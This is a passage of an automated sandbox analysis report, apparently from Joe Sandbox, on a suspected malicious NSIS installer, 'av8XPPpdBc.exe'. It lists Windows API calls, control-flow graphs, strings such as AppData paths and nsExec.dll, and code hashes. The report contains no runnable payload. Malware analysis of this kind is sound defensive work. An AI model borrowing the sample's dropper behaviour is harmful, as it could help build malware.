                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                      • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
                                                                                                                                                                                      • API String ID: 4024019347-2831730964

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                                                                                      • String ID: *B$ FB$ A$ A$... %d%%
                                                                                                                                                                                      • API String ID: 551687249-3833040932

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers,?,?,00000031), ref: 004017B5
                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers,?,?,00000031), ref: 004017DA
                                                                                                                                                                                        • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                        • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp$C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers$ExecToStack
                                                                                                                                                                                      • API String ID: 1941528284-3951532508

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                      • lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                      • lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                      • SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                      • String ID: antholite
                                                                                                                                                                                      • API String ID: 2531174081-3488562018
                                                                                                                                                                                      • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                      • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      control_flow_graph 716 4068db-4068fb GetSystemDirectoryW 717 4068fd 716->717 718 4068ff-406901 716->718 717->718 719 406912-406914 718->719 720 406903-40690c 718->720 722 406915-406948 wsprintfW LoadLibraryExW 719->722 720->719 721 40690e-406910 720->721 721->722
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                      • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                                      • API String ID: 2200240437-1106614640
                                                                                                                                                                                      • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                      • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      control_flow_graph 723 406076-406082 724 406083-4060b7 GetTickCount GetTempFileNameW 723->724 725 4060c6-4060c8 724->725 726 4060b9-4060bb 724->726 727 4060c0-4060c3 725->727 726->724 728 4060bd 726->728 728->727
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406094
                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                      • API String ID: 1716503409-1857211195
                                                                                                                                                                                      • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                      • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      control_flow_graph 729 4015c6-4015da call 402dab call 405ed1 734 401636-401639 729->734 735 4015dc-4015ef call 405e53 729->735 737 401668-4022fb call 401423 734->737 738 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 734->738 742 4015f1-4015f4 735->742 743 401609-40160c call 405b05 735->743 753 402c2f-402c3e 737->753 738->753 755 401660-401663 738->755 742->743 746 4015f6-4015fd call 405b22 742->746 752 401611-401613 743->752 746->743 759 4015ff-401602 call 405aab 746->759 756 401615-40161a 752->756 757 40162c-401634 752->757 755->753 760 401629 756->760 761 40161c-401627 GetFileAttributesW 756->761 757->734 757->735 764 401607 759->764 760->757 761->757 761->760 764->752
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405EDF
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                                                                                        • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers,?,00000000,000000F0), ref: 00401652
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers, xrefs: 00401645
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers
                                                                                                                                                                                      • API String ID: 1892508949-4212467774
                                                                                                                                                                                      • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                                                                                                                      • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                                                                                                                      • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      control_flow_graph 769 4020dd-4020e9 770 4021a8-4021aa 769->770 771 4020ef-402105 call 402dab * 2 769->771 772 4022f6-4022fb call 401423 770->772 780 402115-402124 LoadLibraryExW 771->780 781 402107-402113 GetModuleHandleW 771->781 779 402c2f-402c3e 772->779 783 402126-402135 call 4069ba 780->783 784 4021a1-4021a3 780->784 781->780 781->783 788 402170-402175 call 4055dc 783->788 789 402137-40213d 783->789 784->772 793 40217a-40217d 788->793 791 402156-40216e 789->791 792 40213f-40214b call 401423 789->792 791->793 792->793 802 40214d-402154 792->802 793->779 795 402183-40218d call 403bc9 793->795 795->779 801 402193-40219c FreeLibrary 795->801 801->779 802->793
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                        • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 334405425-0
                                                                                                                                                                                      • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                                                                                                                      • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                                                      • Opcode ID: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                                                                                                                      • Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
                                                                                                                                                                                      • Opcode Fuzzy Hash: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                      • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                                                      • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                                                                                                                      • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004056BF
                                                                                                                                                                                        • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                      • CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2896919175-0
                                                                                                                                                                                      • Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                                                                                                                      • Instruction ID: 02e921673ef7eca27cac182cfb7c492375eb89174892ab9280a6a273fd68093a
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                                                                                                                      • Instruction Fuzzy Hash: 62F0F0728006009BE7011794AE01B9773A4EBC5316F15543BFF89632A0CB3658018B5D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405AFB
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                      • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                                                                                      • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                                                                                      • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, Hype,e",?), ref: 00405B63
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?, Hype,e",?), ref: 00405B70
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3712363035-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                                        • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                                        • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                                        • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                      • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                                                                                                                      • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                      • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                      • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                      • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                      • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                      • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                      • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1096422788-0
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                      • String ID:
